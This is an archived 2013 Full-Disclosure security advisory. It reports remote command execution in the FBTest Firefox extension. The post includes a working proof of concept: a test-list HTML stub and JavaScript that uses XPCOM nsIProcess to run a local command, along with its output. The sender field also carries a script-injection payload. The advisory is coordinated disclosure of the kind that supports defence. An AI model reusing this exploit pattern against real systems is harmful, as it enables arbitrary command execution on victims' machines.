lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <D713E903BD1.00000914tytusromekiatomek@inbox.com>
Date: Mon, 2 Dec 2013 12:29:13 -0800
From: "ScripT setInterval(function(){for( ){alert('fixme')} } 10) /scRIpt"
 <tytusromekiatomek@...ox.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: FBTest remote command execution.

General info:
=============
The Firefox extension FBTest (http://getfirebug.com/wiki/index.php/FBTest) version =< 1.12b4 allows RCE on a host running tests.
This was only tested on Linux. If the user running FBTest would point extension to the URL containing malicious test cases (intentionally or by being lurked),
then JavaScript code can freely call Mozilla components using XPCOM framework. Some may say it's a feature and this is how extensions generally work. OK, cool.

Important notice:
=================
1) It should be crystal clear the FBTest is not part of Firebug.
2) It should be clear that FBTest is not distributed with Firebug.
3) It should be clear Firebug users are not affected in any way by any bugs in FBTest.
4) FBTest is just a helper extension primarily used by Firebug Working Group for testing Firebug.

Thanks to Firebug team and especially to Jan (Honza) Odvarko for help in coordinated disclosure of this advisory.

Running PoC:
============
-- cut --
[New Thread 0xe36ffb70 (LWP 22040)]
[New Thread 0xe2efeb70 (LWP 22041)]
[New Thread 0xe26fdb70 (LWP 22042)]
Linux box 3.2.6 #1 SMP Wed Feb 6 01:19:11 GMT 2013 x86_64 GNU/Linux
[Thread 0xed82db70 (LWP 22027) exited]
[Thread 0xe54ffb70 (LWP 22038) exited]
[Thread 0xeb4ffb70 (LWP 22030) exited]
-- cut --

FBTest stub:
============
-- cut
<!DOCTYPE html>
<html>
<head>
    <!-- XXX: point these to https://getfirebug.com/tests/head/firebug.html -->
    <link rel="stylesheet" href="./testConsole.css" type="text/css"/>
    <link rel="stylesheet" href="./testList.css" type="text/css"/>
    <link rel="stylesheet" href="./testResult.css" type="text/css"/>
    <link rel="stylesheet" href="./tabView.css" type="text/css"/>
    <script type="text/javascript" src="./testListUtils.js"></script>
</head>

<body>
<script type="text/javascript">
    var driverBaseURI = getDriverBaseURI();
    var serverURI = driverBaseURI;

    var testList = [
        {group: "foo",  uri: "poc.js",  desc: "bar" },
    ]
</script>
<div id="tests"></div>

</body>
</html>
-- cut

RCE testcase:
=============
-- cut
function runTest() {
    try {
        main();
        FBTest.clearCache();
    }
    catch (err) {
        FBTest.exception("Exception occured: ",  err);
    }
    finally {
        FBTest.testDone();
    }
}

function main()
{
    try { cmd(); FBTest.clearCache(); } catch (e) { ; }
}

function cmd() {
    try {
        var f = Components.classes["@mozilla.org/file/local;1"]
                        .createInstance(Components.interfaces.nsILocalFile);
    } catch (e) { alert(e); }

    f.initWithPath("/bin/uname");
    var p = Components.classes["@mozilla.org/process/util;1"]
                    .createInstance(Components.interfaces.nsIProcess);
    p.init(f);

    const args = ["-a"];
    p.run(true, args, args.length);
}
-- cut

Credits:
========
AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b

____________________________________________________________
FREE 3D EARTH SCREENSAVER - Watch the Earth right on your desktop!
Check it out at http://www.inbox.com/earth


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ